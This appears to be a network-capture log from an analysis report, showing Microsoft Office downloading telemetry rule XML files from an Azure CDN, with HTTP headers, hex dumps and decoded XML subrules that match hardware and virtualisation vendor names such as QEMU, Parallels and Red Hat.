                                                                                                                                      2024-10-07 01:23:07 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      62192.168.2.44979813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:07 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:07 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 502
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                      ETag: "0x8DC582BB6A0D312"
                                                                                                                                      x-ms-request-id: a5e58c1d-b01e-00ab-5ac9-16dafd000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012307Z-1657d5bbd48gqrfwecymhhbfm800000001pg000000005xar
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:07 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      63192.168.2.44980013.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:07 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:07 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 474
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                      ETag: "0x8DC582BB3F48DAE"
                                                                                                                                      x-ms-request-id: ef9cab6f-f01e-0099-0d00-179171000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012307Z-1657d5bbd48lknvp09v995n79000000002cg00000000fvb1
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:08 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      64192.168.2.44979913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:07 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:07 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 407
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                      ETag: "0x8DC582B9D30478D"
                                                                                                                                      x-ms-request-id: 78a0432a-701e-001e-1805-17f5e6000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012307Z-1657d5bbd48f7nlxc7n5fnfzh000000002ag00000000sz7z
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:08 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      65192.168.2.44980113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:07 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:07 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 408
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                      ETag: "0x8DC582BB9B6040B"
                                                                                                                                      x-ms-request-id: 2f519f63-901e-0016-75ff-16efe9000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012307Z-1657d5bbd48cpbzgkvtewk0wu000000002ug00000000kc0u
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:08 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      66192.168.2.44980213.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:07 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:08 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 469
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                      ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                      x-ms-request-id: b67c2655-301e-0096-2300-17e71d000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012308Z-1657d5bbd48762wn1qw4s5sd3000000002m000000000nebf
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:08 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      67192.168.2.44980313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:08 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:08 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 416
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                      ETag: "0x8DC582BB5284CCE"
                                                                                                                                      x-ms-request-id: 821e4157-c01e-0014-3301-17a6a3000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012308Z-1657d5bbd487nf59mzf5b3gk8n00000002dg00000000bmz4
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:08 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      68192.168.2.44980513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:08 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:08 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 472
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                      ETag: "0x8DC582B91EAD002"
                                                                                                                                      x-ms-request-id: 763e8d43-601e-000d-6912-172618000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012308Z-1657d5bbd48dfrdj7px744zp8s00000002d000000000vguc
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:08 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      69192.168.2.44980613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:08 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:08 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 432
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                      ETag: "0x8DC582BAABA2A10"
                                                                                                                                      x-ms-request-id: 897bc565-f01e-0096-5e60-1710ef000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012308Z-1657d5bbd48gqrfwecymhhbfm800000001gg00000000sb80
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:08 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      70192.168.2.44980813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:08 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:08 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 427
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                      ETag: "0x8DC582BB464F255"
                                                                                                                                      x-ms-request-id: 7875ffac-201e-000c-7f02-1779c4000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012308Z-1657d5bbd48wd55zet5pcra0cg00000002t000000000asat
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:08 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      71192.168.2.44980713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:08 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:08 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 475
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                      ETag: "0x8DC582BBA740822"
                                                                                                                                      x-ms-request-id: 01bf113a-f01e-003c-3703-178cf0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012308Z-1657d5bbd48xlwdx82gahegw400000000320000000003ngd
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
